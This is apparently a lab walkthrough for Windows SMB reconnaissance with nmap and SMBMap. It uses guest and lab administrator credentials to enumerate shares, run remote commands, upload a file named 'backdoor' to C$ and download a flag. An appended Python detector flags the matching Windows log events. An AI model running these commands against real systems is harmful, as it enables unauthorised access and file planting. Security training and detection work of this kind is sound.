Flag Hunt Using Smbmap

This document outlines the steps for conducting Windows reconnaissance using the SMBMap tool, including checking the target IP, running Nmap scans, and enumerating shared folders. It provides specific commands for accessing the SMB server with both guest and administrator credentials, as well as instructions for uploading and downloading files. The document concludes with the retrieval of a flag from the target machine.

Uploaded by

hackeronekamil

Name: Windows Recon: SMB: SMBMap

URL: [Link]

Type: Windows Reconnaissance: SMB

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: Checking the target IP address.

Note: The target IP address is stored in the "target" file.

Command: cat /root/Desktop/target

Step 2: Run an Nmap scan against the target IP.

Command: nmap [Link]


Step 3: We have discovered that multiple ports are open. SMB port 445 is also exposed. We
will run an Nmap script to list the protocols and dialects supported by the SMB server.

Command: nmap -p445 --script smb-protocols [Link]

We have the credentials to access the SMB server, i.e. administrator:smbserver_771

We will use the smbmap Python script to enumerate the target machine.

Step 4: Running the smbmap tool to discover all shared folders and drives.

We will find all the shared folders using a guest user account.

Command: smbmap -u guest -p "" -d . -H [Link]

The guest account is enabled, but it does not have write permission on any
of the shared folders.

Running smbmap with administrator user credentials.

Command: smbmap -u administrator -p smbserver_771 -d . -H [Link]

With the administrator credentials, smbmap lists all the shares along with their permissions and
comments.

Step 5: Execute a command on the target machine through SMB.

Command: smbmap -H [Link] -u administrator -p smbserver_771 -x 'ipconfig'

We can execute commands on the target machine without any issue. This can be abused
to gain a normal or Meterpreter shell. In this lab, we focus on enumeration using
smbmap, without gaining a shell.

Step 6: Listing all drives on the specified host.

Command: smbmap -H [Link] -u Administrator -p 'smbserver_771' -L

Step 7: List the contents of the C:\ drive.

Command: smbmap -H [Link] -u Administrator -p 'smbserver_771' -r 'C$'


We have found all the files and directories present in the C:\ drive.

We can also upload a file using the smbmap tool if we have write permission on the shared
folder.

Step 8: Uploading a sample file.

Commands:

touch backdoor
smbmap -H [Link] -u Administrator -p 'smbserver_771' --upload '/root/backdoor' 'C$\backdoor'

Verify that the file has been uploaded to the target machine.

Command: smbmap -H [Link] -u Administrator -p 'smbserver_771' -r 'C$'

We have successfully uploaded the file.

Step 9: Download the [Link] file.

Commands:

smbmap -H [Link] -u Administrator -p 'smbserver_771' --download 'C$\[Link]'
cat /root/[Link]-C_flag.txt

This reveals the flag to us.

Flag: 25f492dbef8453cdca69a173a75790f0
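
The defender's view of Steps 4 and 7 to 9, as an added example that is not part of the original lab document: it flags guest network logons and reads or writes on administrative shares in Windows Security events (Event ID 4624 and 5145). It assumes logon and Detailed File Share auditing are enabled and the events have already been exported as dictionaries; the sample events, addresses, account names and rule names are constructed for illustration.

```python
import re

# Access-mask bits from Event ID 5145 (detailed file share auditing).
FILE_WRITE_DATA = 0x2    # on a directory: add file
FILE_APPEND_DATA = 0x4   # on a directory: add subdirectory

# Constructed events, reduced to the fields used below. Addresses come from the
# documentation range 192.0.2.0/24; accounts and file names are made up.
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "Guest",
     "IpAddress": "192.0.2.10"},
    {"EventID": 5145, "SubjectUserName": "Administrator", "IpAddress": "192.0.2.10",
     "ShareName": r"\\*\C$", "RelativeTargetName": "\\", "AccessMask": "0x1"},
    {"EventID": 5145, "SubjectUserName": "Administrator", "IpAddress": "192.0.2.10",
     "ShareName": r"\\*\C$", "RelativeTargetName": "backdoor", "AccessMask": "0x2"},
    {"EventID": 5145, "SubjectUserName": "Administrator", "IpAddress": "192.0.2.10",
     "ShareName": r"\\*\C$", "RelativeTargetName": "notes.txt", "AccessMask": "0x1"},
    {"EventID": 5145, "SubjectUserName": "alice", "IpAddress": "192.0.2.50",
     "ShareName": r"\\*\Public", "RelativeTargetName": "report.docx", "AccessMask": "0x2"},
]


def is_admin_share(share_name):
    """True for C$-style drive shares and ADMIN$ (not IPC$ or ordinary shares)."""
    leaf = share_name.rsplit("\\", 1)[-1].upper()
    return leaf == "ADMIN$" or re.fullmatch(r"[A-Z]\$", leaf) is not None


def detect(events):
    """Return (rule, source_ip, account, target) for each suspicious event."""
    findings = []
    for ev in events:
        if (ev["EventID"] == 4624 and ev.get("LogonType") == 3
                and ev.get("TargetUserName", "").lower() == "guest"):
            findings.append(("guest-network-logon", ev["IpAddress"], "Guest", ""))
        elif ev["EventID"] == 5145 and is_admin_share(ev["ShareName"]):
            mask = int(ev["AccessMask"], 16)
            wrote = mask & (FILE_WRITE_DATA | FILE_APPEND_DATA)
            leaf = ev["ShareName"].rsplit("\\", 1)[-1]
            target = leaf + "\\" + ev["RelativeTargetName"].lstrip("\\")
            findings.append(("admin-share-write" if wrote else "admin-share-read",
                             ev["IpAddress"], ev["SubjectUserName"], target))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

A write to the root of C$ from a workstation address, preceded by a guest logon from the same source, is the pattern worth alerting on; the ordinary write to the Public share is left alone.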
